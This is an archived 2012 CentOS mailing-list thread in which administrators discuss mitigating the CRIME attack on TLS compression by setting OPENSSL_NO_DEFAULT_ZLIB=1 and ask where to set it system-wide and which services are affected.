FAQ Search Today's Posts Mark Forums Read
» Video Reviews

» Linux Archive

Linux-archive is a website aiming to archive linux email lists and to make them easily accessible for linux users/developers.


» Sponsor

» Partners

» Sponsor

Go Back   Linux Archive > CentOS > CentOS

 
 
LinkBack Thread Tools
 
Old 09-24-2012, 11:07 AM
Markus Falb
 
Default SSL CRIME

Hi,
Some of you have heard of CRIME, probably.

from https://bugzilla.redhat.com/show_bug.cgi?id=857051
> Adding the following line to the /etc/sysconfig/httpd file:
>
> export OPENSSL_NO_DEFAULT_ZLIB=1

But there are other services but http that use ssl and are vulnerable?
What is the optimal place for setting this environment variable system wide?

I tried to set it in
/etc/profile.d/CRIME.sh
/etc/bashrc
without success.
--
Kind Regards, Markus Falb

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-24-2012, 01:50 PM
Leon Fauster
 
Default SSL CRIME

Am 24.09.2012 um 13:07 schrieb Markus Falb:
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>> Adding the following line to the /etc/sysconfig/httpd file:
>>
>> export OPENSSL_NO_DEFAULT_ZLIB=1
>
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.


the corresponding patch mentioned in the bz above could be adapted and the openssl package recompiled.

--
LF



_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-24-2012, 08:26 PM
"Albert McCann"
 
Default SSL CRIME

> -----Original Message-----
> From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On
> Behalf Of Markus Falb
> Sent: Monday, September 24, 2012 7:07 AM
> To: centos@centos.org
> Subject: [CentOS] SSL CRIME
>
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
> > Adding the following line to the /etc/sysconfig/httpd file:
> >
> > export OPENSSL_NO_DEFAULT_ZLIB=1
>
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system
> wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.

What about placing it in the /etc/rc.d/rc.local file?

Al McCann
---
My computer was sold to me by Mad Man Muntz.

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-24-2012, 09:49 PM
Johnny Hughes
 
Default SSL CRIME

On 09/24/2012 06:07 AM, Markus Falb wrote:
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>> Adding the following line to the /etc/sysconfig/httpd file:
>>
>> export OPENSSL_NO_DEFAULT_ZLIB=1
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.

The setting only matters if programs look for it and do something with
it ... so you would need to set it for the user that starts whatever
service you are trying to protect, if that daemon actually uses the
variable.

Just because a variable does something in httpd, that does not mean the
same variable means the same thing to sshd or any other daemon.

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-24-2012, 10:37 PM
Leon Fauster
 
Default SSL CRIME

Am 24.09.2012 um 23:49 schrieb Johnny Hughes:
> On 09/24/2012 06:07 AM, Markus Falb wrote:
>> Hi,
>> Some of you have heard of CRIME, probably.
>>
>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>
>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>> But there are other services but http that use ssl and are vulnerable?
>> What is the optimal place for setting this environment variable system wide?
>>
>> I tried to set it in
>> /etc/profile.d/CRIME.sh
>> /etc/bashrc
>> without success.
>
> The setting only matters if programs look for it and do something with
> it ... so you would need to set it for the user that starts whatever
> service you are trying to protect, if that daemon actually uses the
> variable.
>
> Just because a variable does something in httpd, that does not mean the
> same variable means the same thing to sshd or any other daemon.




its in openssl itself (rhel5/6)

http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2

IMO, the same above would also apply for e. g. /etc/sysconfig/ldap ...

--
LF









_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-25-2012, 12:45 PM
Markus Falb
 
Default SSL CRIME

On 25.9.2012 00:37, Leon Fauster wrote:
> Am 24.09.2012 um 23:49 schrieb Johnny Hughes:
>> On 09/24/2012 06:07 AM, Markus Falb wrote:
>>> Hi,
>>> Some of you have heard of CRIME, probably.
>>>
>>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>>
>>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>>> But there are other services but http that use ssl and are vulnerable?
>>> What is the optimal place for setting this environment variable system wide?
>>>
>>> I tried to set it in
>>> /etc/profile.d/CRIME.sh
>>> /etc/bashrc
>>> without success.
>>
>> The setting only matters if programs look for it and do something with
>> it ... so you would need to set it for the user that starts whatever
>> service you are trying to protect, if that daemon actually uses the
>> variable.
>>
>> Just because a variable does something in httpd, that does not mean the
>> same variable means the same thing to sshd or any other daemon.
>
>
>
>
> its in openssl itself (rhel5/6)
>
> http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2
>
> IMO, the same above would also apply for e. g. /etc/sysconfig/ldap ...

That was my understanding too. And instead of fixing X services I would
like to fix it for all services at once in one central location.

One could do it in /etc/init.d/functions maybe, but I doubt that it
would survive an update of initscripts.

Now that ssl compression got security relevant, maybe the openssl
default should be changed. Default off, enabled only explicit. Leon, I
know you suggested building a custom openssl package in an earlier
message, but to be honest, I am not very enthusiastic about maintaining
my own openssl. Maybe an upstream bugzilla should be filed.

Another related question: What services are vulnerable to CRIME or the
concepts behind CRIME and what services are not. Everyone is only
talking about http. For example I think that smtp is not vulnerable if
it does not support smtp auth, or maybe ftp is not vulnerable because it
does a separate data channel, and so on...
--
Kind Regards, Markus Falb

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
Old 09-25-2012, 01:01 PM
Markus Falb
 
Default SSL CRIME

On 24.9.2012 22:26, Albert McCann wrote:
>> -----Original Message-----
>> From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On
>> Behalf Of Markus Falb
>> Sent: Monday, September 24, 2012 7:07 AM
>> To: centos@centos.org
>> Subject: [CentOS] SSL CRIME
>>
>> Hi,
>> Some of you have heard of CRIME, probably.
>>
>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>
>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>>
>> But there are other services but http that use ssl and are vulnerable?
>> What is the optimal place for setting this environment variable system
>> wide?
>>
>> I tried to set it in
>> /etc/profile.d/CRIME.sh
>> /etc/bashrc
>> without success.
>
> What about placing it in the /etc/rc.d/rc.local file?

$ ls -l /etc/rc3.d/S99local
lrwxrwxrwx. 1 root root 11 18. Sep 09:08 /etc/rc3.d/S99local -> ../rc.local

It is too late, isn't it?
--
Kind Regards, Markus Falb

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 

Thread Tools




All times are GMT. The time now is 07:15 AM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.
Copyright 2007 - 2008, www.linux-archive.org